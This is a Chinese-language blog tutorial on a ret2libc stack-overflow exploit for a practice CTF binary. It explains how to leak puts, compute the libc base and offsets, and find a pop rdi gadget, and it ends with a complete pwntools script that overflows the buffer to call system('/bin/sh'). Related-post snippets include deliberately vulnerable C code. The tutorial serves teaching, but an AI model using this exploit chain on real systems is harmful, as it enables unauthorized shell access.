栈溢出入门(ret2libc漏洞)

最新推荐文章于 2024-07-25 22:24:14 发布
最新推荐文章于 2024-07-25 22:24:14 发布
阅读量798 收藏 7
点赞数 13
文章标签: 汇编 学习 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80718478/article/details/140209834
版权

先来看下本次学习的文件:

easydemo是本次学习的ELF文件;

ld-linux-x86-64.so.2是一个动态链接器,它的意义是确保程序依赖的libc.so.6这样的库被正确地加载到内存中

libc.so.6是一个Linux中的基本库,其类似于C语言中的头文件stdio.h,但其重要性比stdio.h更强

为什么这样做?

在有些程序中,虽然它是动态编译,但是它所依赖的库也自己打包带走了,在使用时使用自带的库而不是所处系统的库,依次来保证程序与运行的可行性;这样的意义对单个程序来说不大,但对于同一开发者的一套程序来说,相较于静态编译省下了很大一部分空间

根据做PWN题的基本思路,我们来检查一下保护程序的情况:

可以看到这里有一个runpath,即运行路径;程序默认调用的库时所处系统的libc库,这里我们需要通过指令将其更改为我们目录下的文件

执行:

patchelf easydemo --set-interpreter ./ld-linux-x86-64.so.2 --set-rpath .

注意,这里需要ld-linux-x86-64.so.2和libc.so.6均具有可执行权限

rpath是指定的文件夹路径

判断libc的版本:

执行:strings libc.so.6 | grep version

这里是2.26版的libc(较老,以2.28版本为界)

接下来我们用IDA来看一下easydemo:

注意到:

这条语句的含义是给出了所用的puts函数的内存地址,这里的意义是?

ret2libc的原理:

我们可以看到,puts函数是经由libc库动态加载的,而且很明显的函数列表中没有system这样的函数,我们就想到能不能去libc库里面找,因为里面包有的,但是问题在于,虽然程序本身没有开PIE保护,地址是固定的,但是libc库的地址是随机的,在IDA中看到的只是相对位置,但是如果我们知道其中某个函数的绝对地址,我们就可以推算其它函数的绝对地址。

关于内存布局:

可以从这里看到我们的库的路径已经成功修改

我们对这样一个内存布局进行分析:

这一块内存是存放程序的一些表的空间,比如之前提到的.bss表

这一段就是存放堆的内存

这一段是程序需要加载的各种库的内存,其中anon与匿名函数有关

这一段就是栈

这一块用于存放vsyscall页,它的存在使得频繁的系统调用更高效

所有的标准的地址都是物理地址映射出来的虚拟地址

我们要通过puts函数的地址去得到system函数的地址

去IDA里面查看我们的libc:

puts函数的地址(相对):0x78460

system函数的地址(相对):0x47dc0

"bin_sh"的地址(相对):0x1a3ee0

由于puts函数每次加载的地址不同,我们需要动态地进行获取

这里需要使用之前用过的recvuntil方法

sh.recvuntil(b': ')

puts_addr = int(sh.recvuntil(b'\n').replace(b'\n', b''), 16)

log.success("puts_addr: " + hex(puts_addr))

截取成功

这里说一下截取:

这里的两个recvuntil相当于切两刀,第一个recvuntil在:[空格]的后面切了一刀,第二个recvuntil在\n后面切了一刀,此时若令puts_addr等于第二个recvuntil方法的返回值,那么puts_addr的值就会被赋为这两刀之间的内容(带\n),用replace方法将\n抹除,用int方法将得到的字符串转换为16进制整型数据(单个recvuntil是截不到的)

通过puts函数的相对地址推算libc库的基地址:

&puts - puts函数的相对地址 = libc库的基地址

libc库的地址回显如果是000结尾的基本就是对的(对齐)

再根据libc的基地址推算system函数的绝对地址

在libc中找一个rdi的gadget:

结合上面IDA找到的综合编写脚本如下:

from pwn import *

context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'

sh = process('./easydemo')
# gdb.attach(sh, gdbscript="", gdb_args=['-q', '-ex', 'init-pwndbg'])
sh.recvuntil(b': ')
puts_addr = int(sh.recvuntil(b'\n').replace(b'\n', b''), 16)

log.success("puts_addr: " + hex(puts_addr))

libc_base_addr = puts_addr - 0x78460

log.success("libc_base_addr: " + hex(libc_base_addr))

pop_rdi = libc_base_addr + 0x20b8b

bin_sh = libc_base_addr + 0x1a3ee0

sh.sendline(b'A'*88 + p64(pop_rdi) + p64(bin_sh) + p64(libc_base_addr + 0x47dc0))

log.success("Got shell!")


# Write your own code here

sh.interactive()

拿下

栞那酱
关注
  • 13
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PWN篇:ret2libc
weixin_44644249的博客
01-28 436
PWN篇:ret2libc 源码 #include void vuln_func(){ char buf[128]; read(STDIN_FILENO,buf,256); } int main(int argc,char* argv[]){ vuln_func(); write(STDOUT_FILENO,"hello world!\n",13); } 很明显vuln为溢出函数 编译 gcc -m32 -fno-stack-protector -no-pie -z execstack tes
Ret2libc
钞sir的博客
01-26 8804
三生三世十里桃花 她就像是一道疤 像风像雨像飞沙 像空气一样难抓 简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有sys...
ret2libc
我多么希望明天有太阳,来灼烧我腐烂的梦想
08-12 677
ret2libc root@a1station:~/pwn/got# cat got.c #include <stdio.h> static int a; extern int b; extern void test(); int func() { a = 1; b = 2; return 0; } int main() { func(); ...
pwn ret2libc系列
zip471642048的博客
05-30 249
文章目录ret2libc1 题目链接 :https://github.com/ctf-wiki/ctf-challenges ret2libc1 checksec一下只开了NX 和 部分RELRO main函数 secure函数 有溢出给了plt表里也有system函数的address 也有/bin/sh字符串,payload已经可以构造出来了 offset = 0x64 ...
ret2libc2pwn 入门
02-11
pwn 入门
ret2libc1pwn 入门
02-11
pwn 入门
17ret2libc1_64 pwn 入门
02-11
pwn 入门
ret2libc exploit
07-07
### Return-to-libc (ret2libc) Exploit详解 #### 引言 在深入探讨Return-to-libc(简称ret2libc)技术之前,我们先简要回顾一下这一领域的背景知识。随着网络安全领域的不断发展,攻击者与防御者的对抗也在不断...
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
【PWN · ret2libc】[2021 鹤城杯]babyof
Mr_Fmnwon的博客
05-30 1753
64位Linux和32位Linux确乎有着关于参数传递上的不同,然而无论哪种,关于ret2libc这一题型。如果仅仅是wiki上的三道题目,那还是远远不够的。故尝试通过本题,总结ret2libc的一般过程。过程包括通过puts/write来泄露got表中的puts/write的真实地址->计算libc的基址->libc基址+任意库函数相对于libc的偏移量=任意函数真实地址->libc基址+libc中'/bin/sh'偏移量='/bin/sh'地址,如此构造system('/bin/sh')
从零开始学逆向:理解ret2libc-2
weixin_44626085的博客
02-20 1251
ret2libc即劫持程序的控制流,使其执行libc中的函数,一般是返回到某个函数的plt处,或者某个函数的具体位置(函数对应got表的内容),大多情况下是执行system('/bin/sh')。这道题与例题1基本相似,只是程序中没有了/bin/sh字符串,我们需要通过gets函数手动写入/bin/sh字符串到一个可写可执行区域,通常在bss段,在ida找到一个地址
ROP-Ret2Libc概述和利用
fanghuapyk的博客
03-19 1489
ret2libc简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有system函数,但是没有"/bin/sh"字符串 程序中自身就没有system函数和"/bin/sh"字符串,但给
适合新手的ret2libc3之路
Vicl1fe的博客
05-29 3873
rop之libc3 做了一下这道题,感觉收获蛮大,写一篇博客,也方便自己记忆。 题目链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop/#3 参考链接:https://www.jianshu.com/p/5525dde00053 好了回归正题,首先拿到这个题目,ida打开按f5查看伪代码,看到了高危函数...
linux中ret2libc入门与实践
counsellor的专栏
08-23 6779
前言 本来想找一个windows下的溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
程序的机器级表示(一)汇编,汇编格式和数据传输指令
h_17702564256的博客
07-18 1273
程序的机器级表示,两种汇编格式,寄存器的分类,传输指令及其细节
AvaloniaUI的学习
最新发布
lishuangquan1987的博客
07-25 482
官方中文文档:https://docs.avaloniaui.net/zh-Hans/docs/welcome。
编程学习之路:从零到一的成长指南
KsuferNotes
07-22 438
在当今数字化时代,编程技能已经成为许多人职业发展的重要组成部分。不论你是已经在IT业从业多年的老手,还是刚刚起步的编程新手,这篇博客将带你走过编程学习的每一个重要阶段,从而顺利完成从零到一的华丽转变。
昇思25天学习打卡营第14天|Vision Transformer图像分类
Xavier_F的博客
07-21 652
本案例详细介绍了ViT模型在ImageNet数据集上的训练、验证和推理过程,重点讲解了模型的核心结构和关键概念,如Multi-Head Attention、Transformer Encoder和位置编码等。通过学习此案例,用户将掌握ViT的基本原理以及其在图像分类任务中的应用潜力,为深入研究计算机视觉领域提供了坚实基础。!
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值